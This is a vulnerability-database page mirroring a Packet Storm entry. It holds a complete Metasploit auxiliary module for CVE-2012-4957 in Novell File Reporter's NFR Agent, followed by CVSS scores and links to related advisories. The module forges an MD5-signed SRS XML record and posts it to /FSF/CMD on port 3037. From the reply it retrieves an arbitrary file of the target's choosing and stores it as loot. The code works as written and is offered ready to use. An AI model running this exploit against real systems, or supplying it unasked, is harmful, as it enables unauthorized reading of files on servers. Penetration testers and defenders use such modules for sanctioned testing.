Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuan vazquez, metasploit.comPACKETSTORM:181031
HistorySep 01, 2024 - 12:00 a.m.

NFR Agent SRS Record Arbitrary Remote File Access

2024-09-0100:00:00
juan vazquez, metasploit.com
packetstormsecurity.com
18
nfr
agent
srs record
remote file access
novell file reporter
cve-2012-4957
buffer vulnerabilities
ssl

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7

Confidence

Low

EPSS

0.974

Percentile

99.9%

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'NFR Agent SRS Record Arbitrary Remote File Access',  
'Description' => %q{  
NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve  
arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and  
CMD 103, specifying a full pathname. This module has been tested successfully  
against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File  
Reporter 1.0.1).  
},  
'References' =>  
[  
[ 'CVE', '2012-4957' ],  
[ 'URL', 'https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/' ]  
],  
'Author' =>  
[  
'juan vazquez'  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => "Nov 16 2012"  
)  
  
register_options(  
[  
Opt::RPORT(3037),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])  
])  
  
register_autofilter_ports([ 3037 ])  
end  
  
def run_host(ip)  
  
record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>"  
md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase  
message = md5 + record  
  
print_status("Retrieving the file contents")  
  
res = send_request_cgi(  
{  
'uri' => '/FSF/CMD',  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => "text/xml",  
'data' => message  
})  
  
if res and res.code == 200 and not res.body =~ /<RESULT>/  
loot = res.body  
f = ::File.basename(datastore['RFILE'])  
path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])  
print_good("#{datastore['RFILE']} saved in #{path}")  
else  
print_error("Failed to retrieve the file contents")  
end  
end  
end  
  
`

Related

metasploit 4
exploitdb 2
openvas 1
cert 1
zdt 2
nvd 2
seebug 2
exploitpack 1
packetstorm 4
cve 2
checkpoint_advisories 2
prion 2
cvelist 2
saint 4
nessus 1
metasploit
metasploit
NFR Agent SRS Record Arbitrary Remote File Access
2012-11-16 15:03:09
NFR Agent FSFUI Record File Upload RCE
2012-11-16 15:03:09
NFR Agent FSFUI Record Arbitrary Remote File Access
2012-11-16 15:03:09
exploitdb
exploitdb
Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution
2012-12-12 00:00:00
Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)
2012-11-19 00:00:00
openvas
openvas
Novell File Reporter 'NFRAgent.exe' Multiple Security Vulnerabilities
2012-12-12 00:00:00
cert
cert
Novell File Reporter contains multiple vulnerabilities
2012-11-16 00:00:00
zdt
zdt
Novell File Reporter Agent XML Parsing Remote Code Execution
2012-12-12 00:00:00
NFR Agent FSFUI Record File Upload Remote Command Execution
2012-11-17 00:00:00
nvd
nvd
CVE-2012-4959
2012-11-18 19:55:01
CVE-2012-4957
2012-11-18 19:55:01
seebug
seebug
Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)
2014-07-01 00:00:00
NFR Agent FSFUI Record File Upload RCE
2014-07-01 00:00:00
exploitpack
exploitpack
Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution
2012-12-12 00:00:00
packetstorm
packetstorm
NFR Agent FSFUI Record File Upload Remote Command Execution
2012-11-16 00:00:00
Novell File Reporter Code Execution
2012-12-12 00:00:00
NFR Agent FSFUI Record Arbitrary Remote File Access
2024-09-01 00:00:00
cve
cve
CVE-2012-4959
2012-11-18 19:55:01
CVE-2012-4957
2012-11-18 19:55:01
checkpoint_advisories
checkpoint_advisories
Novell File Reporter SRS Arbitrary File Retrieval (CVE-2012-4957)
2012-12-16 00:00:00
Novell File Reporter FSFUI File Upload (CVE-2012-4959)
2012-12-10 00:00:00
prion
prion
Path traversal
2012-11-18 19:55:00
Directory traversal
2012-11-18 19:55:00
cvelist
cvelist
CVE-2012-4957
2012-11-18 19:00:00
CVE-2012-4959
2012-11-18 19:00:00
saint
saint
Novell File Reporter FSFUI File Upload
2012-12-17 00:00:00
Novell File Reporter FSFUI File Upload
2012-12-17 00:00:00
Novell File Reporter FSFUI File Upload
2012-12-17 00:00:00
nessus
nessus
Novell File Reporter Agent FSFUI UICMD 126 Arbitrary File Download
2012-11-20 00:00:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

AI Score

7

Confidence

Low

EPSS

0.974

Percentile

99.9%

JSON
Related for PACKETSTORM:181031
metasploit4exploitdb2openvas1cert1zdt2nvd2seebug2exploitpack1packetstorm4cve2checkpoint_advisories2prion2cvelist2saint4nessus1